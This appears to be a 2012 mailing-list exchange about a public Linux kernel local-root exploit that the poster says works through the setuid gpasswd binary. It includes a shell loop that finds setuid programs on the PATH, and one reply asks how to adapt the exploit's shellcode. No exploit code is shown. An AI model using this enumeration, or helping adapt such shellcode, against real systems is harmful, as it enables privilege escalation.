On Thu, Jan 26, 2012 at 4:52 AM, Martti Kühne <mysatyre@gmail.com> wrote:
On Tue, Jan 24, 2012 at 10:41:10AM +0530, Jayesh Badwaik wrote:
Hi,
I have just discovered this kernel exploit which allows a local user to obtain root priviliges. The detailed explanation is given at [1]. The patch has been apparently fixed in the kernel as of now (according to the blog post), but that update has not yet come into archlinux. And while, the /bin/su is fine and is not vulnerable to exploit, gpasswd is vulnerable and I am able to carry out the exploit on my computer as of now, using the gpasswd program. The list of programs that may be vulnerable are given by the following command
[user@localhost]$ for p in $(echo $PATH | tr ‘:’ ‘ ‘); do find “$p” -perm -4005; done
which gives in my system the following list [3]
Wow, I'm really interested in this, how would I go about to modify the shell code to push one of those paths on the stack? AFAICT they don't fit into a qword like /bin/sh, do they?
cheers! mar77i
Sorry, if I misquoted before, I did not *discover*, rather I stumbled upon on the internet. I realized my flaw, but later I thought the issue is too widespread for me to be misunderstood. So maybe, you'd be better off contacting the original author (see the blog, link 1 in my post). -- ------------------------------------------------------- Cheers Jayesh Vinay Badwaik Electronics and Communication Engineering VNIT, INDIA -